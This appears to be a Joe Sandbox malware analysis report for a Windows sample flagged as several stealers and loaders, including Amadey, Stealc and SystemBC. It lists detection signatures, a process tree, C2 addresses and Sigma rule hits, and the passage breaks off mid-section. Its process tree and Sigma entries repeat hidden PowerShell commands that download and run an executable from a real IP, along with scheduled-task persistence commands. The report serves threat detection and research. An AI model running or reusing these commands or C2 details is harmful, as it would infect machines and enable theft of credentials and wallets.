Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
aV2ffcSuKl.exe

Overview

General Information

Sample name:aV2ffcSuKl.exe
renamed because original name is a hash value
Original sample name:29dbe0a1208dfedac751f580a83fca87.exe
Analysis ID:1630726
MD5:29dbe0a1208dfedac751f580a83fca87
SHA1:5dba16b31a81c541525a169fd76426e7ae9a04fd
SHA256:bced8cc13d6bccdb3f54e578f084b0d31fb987022d2c5e582f3ba31bb77370f9
Tags:exeuser-abuse_ch
Infos:

Detection

Amadey, GCleaner, LummaC Stealer, PureLog Stealer, Stealc, SystemBC, Vidar
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Suricata IDS alerts for network traffic
Yara detected Amadey
Yara detected Amadeys Clipper DLL
Yara detected GCleaner
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected Stealc
Yara detected SystemBC
Yara detected Vidar stealer
Yara detected obfuscated html page
.NET source code contains method to dynamically call methods (often used by packers)
Allocates memory in foreign processes
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to start a terminal service
Creates HTA files
Creates HTML files with .exe extension (expired dropper behavior)
Creates multiple autostart registry keys
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Monitors registry run keys for changes
PE file contains section with special chars
Powershell drops PE file
Sample uses string decryption to hide its real strings
Send many emails (e-Mail Spam)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: PowerShell DownloadFile
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to download and execute files (via powershell)
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if the current process is being debugged
Connects to many different domains
Connects to several IPs in different countries
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Executes massive DNS lookups (> 100)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Tries to resolve many domain names, but no domain seems valid
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • aV2ffcSuKl.exe (PID: 7952 cmdline: "C:\Users\user\Desktop\aV2ffcSuKl.exe" MD5: 29DBE0A1208DFEDAC751F580A83FCA87)
    • cmd.exe (PID: 8000 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 8076 cmdline: schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)
    • mshta.exe (PID: 8020 cmdline: mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta MD5: 06B02D5C097C7DB1F109749C45F3F505)
      • powershell.exe (PID: 8132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE (PID: 2668 cmdline: "C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE" MD5: 00C6B612E1A33CCE7BE3A28B82492A84)
          • rapes.exe (PID: 3308 cmdline: "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" MD5: 00C6B612E1A33CCE7BE3A28B82492A84)
  • mshta.exe (PID: 6172 cmdline: C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 7096 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • rapes.exe (PID: 8120 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: 00C6B612E1A33CCE7BE3A28B82492A84)
  • rapes.exe (PID: 2188 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: 00C6B612E1A33CCE7BE3A28B82492A84)
    • nhDLtPT.exe (PID: 6360 cmdline: "C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe" MD5: A9749EE52EEFB0FD48A66527095354BB)
      • Gxtuum.exe (PID: 784 cmdline: "C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe" MD5: A9749EE52EEFB0FD48A66527095354BB)
    • ILqcVeT.exe (PID: 4156 cmdline: "C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe" MD5: F0AD59C5E3EB8DA5CBBF9C731371941C)
      • chrome.exe (PID: 7972 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
        • chrome.exe (PID: 876 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 --field-trial-handle=2156,i,114299149771300209,1457107996023773148,262144 /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
      • msedge.exe (PID: 5204 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 2032 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2228,i,8936571210459543028,10198378582791773127,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • rXOl0pp.exe (PID: 8104 cmdline: "C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe" MD5: F0AD59C5E3EB8DA5CBBF9C731371941C)
    • 132fd7f0ed.exe (PID: 2704 cmdline: "C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe" MD5: CB7D258E67E7C7B732E4E03C40355FF0)
      • cmd.exe (PID: 5484 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn flwMsmavzAp /tr "mshta C:\Users\user\AppData\Local\Temp\rKRHHhiYP.hta" /sc minute /mo 25 /ru "user" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 5532 cmdline: schtasks /create /tn flwMsmavzAp /tr "mshta C:\Users\user\AppData\Local\Temp\rKRHHhiYP.hta" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)
      • mshta.exe (PID: 6608 cmdline: mshta C:\Users\user\AppData\Local\Temp\rKRHHhiYP.hta MD5: 06B02D5C097C7DB1F109749C45F3F505)
        • powershell.exe (PID: 7196 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6556 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\10111060121\am_no.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 5160 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • cmd.exe (PID: 7008 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • powershell.exe (PID: 4772 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 5656 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • powershell.exe (PID: 6296 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 7216 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • powershell.exe (PID: 5528 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • schtasks.exe (PID: 4632 cmdline: schtasks /create /tn "U6NDLmaxnYP" /tr "mshta \"C:\Temp\plDCQRtK9.hta\"" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)
      • mshta.exe (PID: 6124 cmdline: mshta "C:\Temp\plDCQRtK9.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
        • powershell.exe (PID: 7836 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 1884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 7dbaa342f5.exe (PID: 2656 cmdline: "C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe" MD5: 473C98DE49CD906F1DB4F35F75AF2DB6)
  • Gxtuum.exe (PID: 7800 cmdline: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe MD5: A9749EE52EEFB0FD48A66527095354BB)
    • vertualiziren.exe (PID: 8076 cmdline: "C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe" MD5: 1DC908064451D5D79018241CEA28BC2F)
  • svchost.exe (PID: 7092 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • benskvi.exe (PID: 3108 cmdline: C:\ProgramData\jnxnee\benskvi.exe MD5: 1DC908064451D5D79018241CEA28BC2F)
  • mshta.exe (PID: 7572 cmdline: C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\rKRHHhiYP.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 3572 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • msedge.exe (PID: 3128 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6948 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2372 --field-trial-handle=2136,i,8097992319961427004,17557995905178344852,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • mshta.exe (PID: 5212 cmdline: C:\Windows\system32\mshta.EXE "C:\Temp\plDCQRtK9.hta" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • 132fd7f0ed.exe (PID: 3668 cmdline: "C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe" MD5: CB7D258E67E7C7B732E4E03C40355FF0)
    • cmd.exe (PID: 5272 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn UIP4BmakpNx /tr "mshta C:\Users\user\AppData\Local\Temp\1lEt3ife9.hta" /sc minute /mo 25 /ru "user" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 6948 cmdline: schtasks /create /tn UIP4BmakpNx /tr "mshta C:\Users\user\AppData\Local\Temp\1lEt3ife9.hta" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)
    • mshta.exe (PID: 5784 cmdline: mshta C:\Users\user\AppData\Local\Temp\1lEt3ife9.hta MD5: 06B02D5C097C7DB1F109749C45F3F505)
      • powershell.exe (PID: 6060 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 4772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
GCleanerNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.gcleaner
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
SystemBCSystemBC is a multiplatform proxy malware active since August 2019. It creates SOCKS5 network tunnels in the victims network and connects to its C2 server using a custom, RC4-encrypted protocol. It can also download and execute additional malware, with payloads either written to disk or mapped into memory. The SystemBC kit, including the C2 panel, server, and malware executables, is sold in underground forums.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.systembc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Amadey

{"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}

Threatname: GCleaner

{"C2 addresses": ["185.156.73.73", "45.91.200.135"]}

Threatname: SystemBC

{"HOST1": "towerbingobongoboom.com", "HOST2": "62.60.226.86"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

        Dropped Files

        SourceRuleDescriptionAuthorStrings
        C:\Users\user\AppData\Local\Temp\rKRHHhiYP.htaJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
          C:\Temp\plDCQRtK9.htaJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
            C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
              C:\Users\user\AppData\Local\Temp\10111190101\acd63ce6fe.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                C:\Users\user\AppData\Local\Temp\1lEt3ife9.htaJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
                  Click to see the 4 entries

                  Memory Dumps

                  SourceRuleDescriptionAuthorStrings
                  0000000B.00000002.1409878176.0000000000621000.00000040.00000001.01000000.0000000B.sdmpJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                    00000010.00000003.1782574386.0000000005060000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                      0000000C.00000003.1399696987.0000000004CE0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                        00000019.00000003.2063180045.00000000053A0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
                          00000017.00000002.2385311293.0000000000F81000.00000040.00000001.01000000.00000013.sdmpJoeSecurity_StealcYara detected StealcJoe Security
                            Click to see the 47 entries

                            Unpacked PEs

                            SourceRuleDescriptionAuthorStrings
                            62.2.7dbaa342f5.exe.dd00000.6.raw.unpackJoeSecurity_GCleanerYara detected GCleanerJoe Security
                              62.2.7dbaa342f5.exe.da70000.3.raw.unpackJoeSecurity_GCleanerYara detected GCleanerJoe Security
                                62.2.7dbaa342f5.exe.da18000.2.raw.unpackJoeSecurity_GCleanerYara detected GCleanerJoe Security
                                  21.0.Gxtuum.exe.cb0000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                                    22.0.Gxtuum.exe.cb0000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
                                      Click to see the 5 entries

                                      Other

                                      SourceRuleDescriptionAuthorStrings
                                      amsi32_8132.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                                        amsi64_7096.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                                          amsi32_7196.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                                            amsi64_3572.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                                              amsi32_7836.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                                                Click to see the 1 entries

                                                Sigma Signatures

                                                System Summary

                                                barindex
                                                Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                                                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\aV2ffcSuKl.exe", ParentImage: C:\Users\user\Desktop\aV2ffcSuKl.exe, ParentProcessId: 7952, ParentProcessName: aV2ffcSuKl.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 8000, ProcessName: cmd.exe
                                                Sigma detected: Invoke-Obfuscation VAR+ Launcher
                                                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\aV2ffcSuKl.exe", ParentImage: C:\Users\user\Desktop\aV2ffcSuKl.exe, ParentProcessId: 7952, ParentProcessName: aV2ffcSuKl.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 8000, ProcessName: cmd.exe
                                                Sigma detected: New RUN Key Pointing to Suspicious Folder
                                                Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe, ProcessId: 2188, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\132fd7f0ed.exe
                                                Sigma detected: PowerShell DownloadFile
                                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 8020, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 8132, ProcessName: powershell.exe
                                                Sigma detected: Script Interpreter Execution From Suspicious Folder
                                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\Desktop\aV2ffcSuKl.exe", ParentImage: C:\Users\user\Desktop\aV2ffcSuKl.exe, ParentProcessId: 7952, ParentProcessName: aV2ffcSuKl.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta, ProcessId: 8020, ProcessName: mshta.exe
                                                Sigma detected: Suspicious MSHTA Child Process
